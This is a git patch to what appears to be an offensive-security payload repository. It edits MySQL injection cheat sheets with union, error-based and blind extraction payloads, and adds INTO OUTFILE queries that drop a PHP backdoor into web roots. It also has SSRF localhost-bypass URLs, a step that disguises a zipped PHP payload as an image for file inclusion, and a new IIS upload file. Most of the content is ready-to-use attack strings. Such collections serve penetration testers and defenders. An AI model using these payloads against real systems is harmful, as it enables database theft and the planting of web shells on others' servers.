From f740d8e825e3df37ef01590c4cb2578f15f18876 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 9 Nov 2017 09:05:50 +0100 Subject: [PATCH] MySQL - Code exec --- File Inclusion - Path Traversal/README.md | 2 +- SQL injection/MySQL Injection.md | 21 +++++++++++---------- SSRF injection/README.md | 8 ++++++++ Upload insecure files/IIS/index.stm | 14 ++++++++++++++ 4 files changed, 34 insertions(+), 11 deletions(-) create mode 100644 Upload insecure files/IIS/index.stm diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index b7e4565..e0de154 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod LFI Wrapper ZIP ```python -echo "" > payload.php; +echo "
" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 6d399f4..824bac1 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,6 +1,6 @@ # MYSQL Injection -##Detect columns number +## Detect columns number Using a simple ORDER ``` order by 1 @@ -10,7 +10,7 @@ order by 3 order by XXX ``` -##MySQL Union Based +## MySQL Union Based ``` UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... @@ -18,13 +18,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` -##MySQL Error Based - Basic +## MySQL Error Based - Basic ``` (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` -##MYSQL Error Based - UpdateXML function +## MYSQL Error Based - UpdateXML function ``` AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- @@ -33,7 +33,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- ``` -##MYSQL Error Based - Extractvalue function +## MYSQL Error Based - Extractvalue function ``` AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- @@ -42,7 +42,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` -##MYSQL Blind with MAKE_SET +## MYSQL Blind with MAKE_SET ``` AND MAKE_SET(YOLO<(SELECT(length(version()))),1) AND MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# ``` -##MYSQL DROP SHELL +## MYSQL DROP SHELL ``` SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' +-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' ``` diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 3dfbdae..051d589 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -43,6 +43,14 @@ http://[::]:22/ SSH http://[::]:3128/ Squid ``` +``` +http://0000::1:80/ +http://0000::1:25/ SMTP +http://0000::1:22/ SSH +http://0000::1:3128/ Squid +``` + + Bypass localhost with a domain redirecting to locahost ``` http://n-pn.info diff --git a/Upload insecure files/IIS/index.stm b/Upload insecure files/IIS/index.stm new file mode 100644 index 0000000..73111e8 --- /dev/null +++ b/Upload insecure files/IIS/index.stm @@ -0,0 +1,14 @@ + + + + + + + + + + + + + +